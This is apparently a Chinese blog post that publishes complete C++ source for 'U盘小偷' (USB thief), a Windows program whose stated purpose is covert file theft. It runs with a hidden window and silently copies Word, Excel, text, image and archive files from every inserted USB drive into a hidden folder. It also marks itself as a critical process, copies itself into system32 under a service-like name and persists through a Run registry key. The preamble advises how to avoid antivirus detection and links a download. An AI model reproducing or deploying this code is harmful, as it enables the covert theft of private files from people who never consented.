不多说,直接上代码,貌似现在流行代码即文档,就不做说明了
注:
这程序360报毒,云引擎报HEUR/Malware.QVM10.Gen,要解决的话,可以把写注册表给删了,把复制自身到C盘给干掉,就不会报毒了
在http://www.virscan.org/扫描有AVG报毒,其余都不报报毒
下载地址:http://www.lanyus.com/wordpress/wp-content/uploads/2013/03/USB.rar
解压密码:www.lanyus.com
/**
版权所有 (C), 2013, 无心问世工作室
程序名: U盘小偷
作者: 无心问世
版本: v1.0
日期: 2013/3/15
描述: 复制U盘里的文档的东西,你懂的
使用此程序可随意修改,发布,但需保留作者版权信息
**/
#include <windows.h>
#include <string>
#include <stdio.h>
#include <Dbt.h>
#include <iostream>
#include "io.h"
#include "tlhelp32.h"
#include "stdio.h"
#include <tchar.h>
#include <conio.h>
#include <fstream>
using namespace std;
HANDLE hOneInstanceMutex;
char to_dst[10000] = "D:\\Program Files\\Tencent\\QQ\\Bin\\Import\\";
typedef ULONG(__stdcall*PRtlAdjustPrivilege)(ULONG Privilege,int Enable,int CurrentThread,int*Enabled);
typedef ULONG(__stdcall*PNtSetInformationProcess)(HANDLE ProcessHandle,ULONG InformationClass,void*Information,ULONG Length);
int Getdisknumber(LPCTSTR lpRootPathName);
void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir);
void Dir(char *lpPath,char *dst_dir,char *dst_list_dir);
LRESULT CALLBACK WndProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam);
int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH]);
int Safe();
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
HMODULE ntdll;
int b;
PRtlAdjustPrivilege pRtlAdjustPrivilege;
PNtSetInformationProcess pNtSetInformationProcess;
ntdll=GetModuleHandleW(L"ntdll.dll");
pRtlAdjustPrivilege=(PRtlAdjustPrivilege)GetProcAddress(ntdll,"RtlAdjustPrivilege");
pNtSetInformationProcess=(PNtSetInformationProcess)GetProcAddress(ntdll,"NtSetInformationProcess");
pRtlAdjustPrivilege(20,1,0,&b);
b=1;
pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
hOneInstanceMutex = NULL;
hOneInstanceMutex = ::CreateMutex(NULL, FALSE, _T("USBSPY_is_Running"));
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
hOneInstanceMutex = NULL;
b=0;
pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
return 0;
}
WNDCLASS wndclass;
wndclass.cbClsExtra=0;
wndclass.cbWndExtra=0;
wndclass.hbrBackground=(HBRUSH)GetStockObject(BLACK_BRUSH);
wndclass.hCursor=LoadCursor(NULL,IDC_ICON);
wndclass.hIcon=LoadIcon(NULL,IDI_ASTERISK);
wndclass.hInstance=hInstance;
wndclass.lpfnWndProc=WndProc;
wndclass.lpszClassName="usb";
wndclass.lpszMenuName=NULL;
wndclass.style=CS_VREDRAW|CS_HREDRAW;
RegisterClass(&wndclass);
HWND hwnd;
hwnd=CreateWindow("usb","",WS_OVERLAPPEDWINDOW,150,150,683,384,NULL,NULL,hInstance,NULL);
ShowWindow(hwnd,SW_HIDE);
UpdateWindow(hwnd);
MSG msg;
while(GetMessage(&msg,hwnd,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
Safe();
}
b=0;
pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
return 0;
}
LRESULT CALLBACK WndProc( HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
switch(uMsg)
{
case WM_PAINT:
{
PAINTSTRUCT ps;
BeginPaint(hwnd,&ps);
EndPaint(hwnd,&ps);
break;
}
case WM_CLOSE:
{
return FALSE;
break;
}
case WM_DESTROY:
{
return FALSE;
break;
}
case WM_CREATE:
{
Safe();
break;
}
case WM_DEVICECHANGE:
{
if(lParam!=0)
{
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
if(lpdb->dbch_devicetype==DBT_DEVTYP_VOLUME)
{
if(wParam==DBT_DEVICEARRIVAL)
{
long i,j;
TCHAR buf[100];
TCHAR *cdbuf;
j=100;
i=GetLogicalDriveStrings(j,buf);
for(j=0;j<i;j++)
{
cdbuf=&buf[j];
if(GetDriveType(cdbuf)==DRIVE_REMOVABLE)
{
char disk_number[260];
sprintf(disk_number,"%d",Getdisknumber(cdbuf));
char to_dst_dir[260];
char set_hid_dir[260];
strcpy(to_dst_dir,to_dst);
strcat(to_dst_dir,disk_number);
strcpy(set_hid_dir,to_dst_dir);
strcat(to_dst_dir,"\\");
char imdstfile[200];
strcpy(imdstfile,cdbuf);
strcat(imdstfile,"XF5201314");
fstream _file;
_file.open(imdstfile,ios::in);
if(_file)
{
continue;
}
CreateDirectory(to_dst_dir,NULL);
ImDir(cdbuf,to_dst_dir,to_dst_dir);
Dir(cdbuf,to_dst_dir,to_dst_dir);
char cmdline[260];
strcpy(cmdline,"cmd /c dir \"");
strcat(cmdline,cdbuf);
strcat(cmdline,"\" /S /O:-D /T:W /N > \"");
strcat(cmdline,set_hid_dir);
strcat(cmdline,".txt\"");
WinExec(cmdline,SW_HIDE);
char cmdstrend[260];
strcpy(cmdstrend,"cmd /c attrib +R +S +H \"");
strcat(cmdstrend,set_hid_dir);
strcat(cmdstrend,"\"");
WinExec(cmdstrend,SW_HIDE);
char cmdstrimdir[260];
strcpy(cmdstrimdir,"cmd /c echo \"--------------------------------\" >> \"");
strcat(cmdstrimdir,to_dst_dir);
strcat(cmdstrimdir,"ImFileChange.txt\"");
WinExec(cmdstrimdir,SW_HIDE);
char cmdstrimdir2[260];
strcpy(cmdstrimdir2,"cmd /c echo \"--------------------------------\" >> \"");
strcat(cmdstrimdir2,to_dst_dir);
strcat(cmdstrimdir2,"FileChange.txt\"");
WinExec(cmdstrimdir2,SW_HIDE);
}
}
}
}
}
break;
}
default:
{
return DefWindowProc(hwnd,uMsg,wParam,lParam);
break;
}
}
return 0;
}
int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH])
{
HKEY hkResult;
TCHAR Path[MAX_PATH];
strcpy(Path,"\"");
strcat(Path,lpFilename);
strcat(Path,"\"");
LPCSTR regname="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
ret=RegSetValueEx(hkResult,keyname,0,REG_SZ,(unsigned char *)Path,sizeof(Path));
RegCloseKey(hkResult);
return 0;
}
void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir)
{
char szFind[10000];
strcpy(szFind,lpPath);
strcat(szFind,"\\*.*");
WIN32_FIND_DATA wfd;
HANDLE hFind=FindFirstFile(szFind,&wfd);
if (hFind == INVALID_HANDLE_VALUE)
{
FindClose(hFind);
return;
}
else
{
do
{
if (wfd.cFileName[0] == '.')
continue;
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
char szFile[10000];
char dir[10000];
strcpy(szFile,lpPath);
strcpy(dir,dst_dir);
strcat(szFile,"\\");
strcat(dir,"\\");
strcat(szFile,wfd.cFileName);
strcat(dir,wfd.cFileName);
CreateDirectory(dir,NULL);
ImDir(szFile,dir,dst_list_dir);
}
else
{
char szFile[10000];
strcpy(szFile,lpPath);
strcat(szFile,"\\");
strcat(szFile,wfd.cFileName);
int len=strlen(szFile);
char *p=&szFile[len-3];
strlwr(p);
if(strcmp(p,"doc")==0||strcmp(p,"docx")==0)
{
char dst_file[10000];
strcpy(dst_file,dst_dir);
strcat(dst_file,"\\");
strcat(dst_file,wfd.cFileName);
fstream _file;
_file.open(dst_file,ios::in);
if(!_file)
{
CopyFile(szFile,dst_file,true);
char cmdstrimdir1[260];
strcpy(cmdstrimdir1,"cmd /c echo \"");
strcat(cmdstrimdir1,szFile);
strcat(cmdstrimdir1,"\" >> \"");
strcat(cmdstrimdir1,dst_list_dir);
strcat(cmdstrimdir1,"ImFileChange.txt\"");
WinExec(cmdstrimdir1,SW_HIDE);
}
else
{
WIN32_FIND_DATA dst;
HANDLE find_dst = FindFirstFile(dst_file,&dst);
LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime);
if (lRet != 0)
{
CopyFile(szFile,dst_file,false);
char cmdstrimdir2[260];
strcpy(cmdstrimdir2,"cmd /c echo \"");
strcat(cmdstrimdir2,szFile);
strcat(cmdstrimdir2,"\" >> \"");
strcat(cmdstrimdir2,dst_list_dir);
strcat(cmdstrimdir2,"ImFileChange.txt\"");
WinExec(cmdstrimdir2,SW_HIDE);
}
FindClose(find_dst);
}
}
}
}
while(FindNextFile(hFind, &wfd));
FindClose(hFind);
}
}
void Dir(char *lpPath,char *dst_dir,char *dst_list_dir)
{
char szFind[10000];
strcpy(szFind,lpPath);
strcat(szFind,"\\*.*");
WIN32_FIND_DATA wfd;
HANDLE hFind=FindFirstFile(szFind,&wfd);
if (hFind == INVALID_HANDLE_VALUE)
{
FindClose(hFind);
return;
}
else
{
do
{
if (wfd.cFileName[0] == '.')
continue;
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
char szFile[10000];
char dir[10000];
strcpy(szFile,lpPath);
strcpy(dir,dst_dir);
strcat(szFile,"\\");
strcat(dir,"\\");
strcat(szFile,wfd.cFileName);
strcat(dir,wfd.cFileName);
CreateDirectory(dir,NULL);
Dir(szFile,dir,dst_list_dir);
}
else
{
char szFile[10000];
strcpy(szFile,lpPath);
strcat(szFile,"\\");
strcat(szFile,wfd.cFileName);
int len=strlen(szFile);
char *p=&szFile[len-3];
strlwr(p);
if(strcmp(p,"xls")==0||strcmp(p,"xlsx")==0||strcmp(p,"txt")==0||strcmp(p,"jpg")==0||strcmp(p,"png")==0||strcmp(p,"bmp")==0||strcmp(p,"rar")==0||strcmp(p,"zip")==0)
{
char dst_file[10000];
strcpy(dst_file,dst_dir);
strcat(dst_file,"\\");
strcat(dst_file,wfd.cFileName);
fstream _file;
_file.open(dst_file,ios::in);
if(!_file)
{
CopyFile(szFile,dst_file,true);
char cmdstrimdir1[260];
strcpy(cmdstrimdir1,"cmd /c echo \"");
strcat(cmdstrimdir1,szFile);
strcat(cmdstrimdir1,"\" >> \"");
strcat(cmdstrimdir1,dst_list_dir);
strcat(cmdstrimdir1,"FileChange.txt\"");
WinExec(cmdstrimdir1,SW_HIDE);
}
else
{
WIN32_FIND_DATA dst;
HANDLE find_dst = FindFirstFile(dst_file,&dst);
LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime);
if (lRet != 0)
{
CopyFile(szFile,dst_file,false);
char cmdstrimdir2[260];
strcpy(cmdstrimdir2,"cmd /c echo \"");
strcat(cmdstrimdir2,szFile);
strcat(cmdstrimdir2,"\" >> \"");
strcat(cmdstrimdir2,dst_list_dir);
strcat(cmdstrimdir2,"FileChange.txt\"");
WinExec(cmdstrimdir2,SW_HIDE);
}
FindClose(find_dst);
}
}
}
}
while(FindNextFile(hFind, &wfd));
FindClose(hFind);
}
}
int Getdisknumber(LPCTSTR lpRootPathName)
{
LPTSTR lpVolumeNameBuffer=new char[12];
DWORD nVolumeNameSize=12;
DWORD VolumeSerialNumber;
DWORD MaximumComponentLength;
LPTSTR lpFileSystemNameBuffer=new char[10];
DWORD nFileSystemNameSize=10;
DWORD FileSystemFlags;
::GetVolumeInformation(lpRootPathName,lpVolumeNameBuffer,nVolumeNameSize,&VolumeSerialNumber,&MaximumComponentLength, &FileSystemFlags,lpFileSystemNameBuffer,nFileSystemNameSize);
return VolumeSerialNumber;
}
int Safe()
{
char cmdmkdir[260];
strcpy(cmdmkdir,"cmd /c mkdir \"");
strcat(cmdmkdir,to_dst);
strcat(cmdmkdir,"\"");
WinExec(cmdmkdir,SW_HIDE);
TCHAR ExeFullPath[MAX_PATH];
GetModuleFileName(NULL,ExeFullPath,MAX_PATH);
TCHAR NewFilePath[MAX_PATH]="C:\\WINDOWS\\system32\\WinServer.exe";
CopyFile(ExeFullPath,NewFilePath,TRUE);
AutoStartSystem("WinServer",NewFilePath);
return 1;
}
近期评论